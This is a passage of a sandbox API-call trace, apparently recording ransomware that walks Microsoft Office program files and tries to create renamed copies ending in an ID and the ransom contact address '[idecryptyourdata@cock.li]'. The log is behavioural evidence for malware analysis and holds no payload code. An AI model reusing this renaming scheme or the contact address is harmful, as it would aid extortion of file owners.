dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.843] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmuxmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmuxmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.844] CloseHandle (hObject=0x544) returned 1 [0175.845] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.845] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.845] CloseHandle (hObject=0x544) returned 1 [0175.846] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.846] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.outlookmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlookmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.846] CloseHandle (hObject=0x544) returned 1 [0175.847] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.847] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.847] CloseHandle (hObject=0x544) returned 1 [0175.848] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.848] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.848] CloseHandle (hObject=0x544) returned 1 [0175.849] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.849] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.powerpointmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpointmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.849] CloseHandle (hObject=0x544) returned 1 [0175.850] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.850] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.851] CloseHandle (hObject=0x544) returned 1 [0175.854] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.854] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.projectmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.projectmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.854] CloseHandle (hObject=0x544) returned 1 [0175.855] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.855] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.855] CloseHandle (hObject=0x544) returned 1 [0175.856] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.856] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.es-es.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.es-es.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.856] CloseHandle (hObject=0x544) returned 1 [0175.857] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.857] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.858] CloseHandle (hObject=0x544) returned 1 [0175.858] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.858] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.proofing.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proofing.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.859] CloseHandle (hObject=0x544) returned 1 [0175.860] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.860] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.861] CloseHandle (hObject=0x544) returned 1 [0175.861] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.861] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.publishermui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publishermui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.862] CloseHandle (hObject=0x544) returned 1 [0175.863] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.863] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.863] CloseHandle (hObject=0x544) returned 1 [0176.048] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.048] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.048] CloseHandle (hObject=0x530) returned 1 [0176.050] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.050] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.visiomui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visiomui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.051] CloseHandle (hObject=0x530) returned 1 [0176.052] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.052] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.052] CloseHandle (hObject=0x530) returned 1 [0176.053] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.054] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.wordmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.wordmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.054] CloseHandle (hObject=0x530) returned 1 [0176.056] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.056] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\AppXManifestLoc.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\loc\\appxmanifestloc.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.057] CloseHandle (hObject=0x530) returned 1 [0176.517] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.518] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BASIC.HTM.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\basic.htm.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.531] CloseHandle (hObject=0x534) returned 1 [0176.533] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.533] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.533] CloseHandle (hObject=0x534) returned 1 [0176.535] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.535] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.535] CloseHandle (hObject=0x534) returned 1 [0176.536] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.536] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR20F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir20f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.536] CloseHandle (hObject=0x534) returned 1 [0176.537] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.537] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR21F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir21f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.538] CloseHandle (hObject=0x534) returned 1 [0176.538] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.538] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR22F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir22f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.539] CloseHandle (hObject=0x534) returned 1 [0176.539] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.539] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR23F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir23f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.540] CloseHandle (hObject=0x534) returned 1 [0176.540] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.540] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR24F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir24f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.541] CloseHandle (hObject=0x534) returned 1 [0176.541] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.541] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR25F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir25f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.542] CloseHandle (hObject=0x534) returned 1 [0176.542] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.542] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR26F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir26f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.543] CloseHandle (hObject=0x534) returned 1 [0176.544] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.544] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR27F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir27f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.544] CloseHandle (hObject=0x534) returned 1 [0176.545] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.545] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: 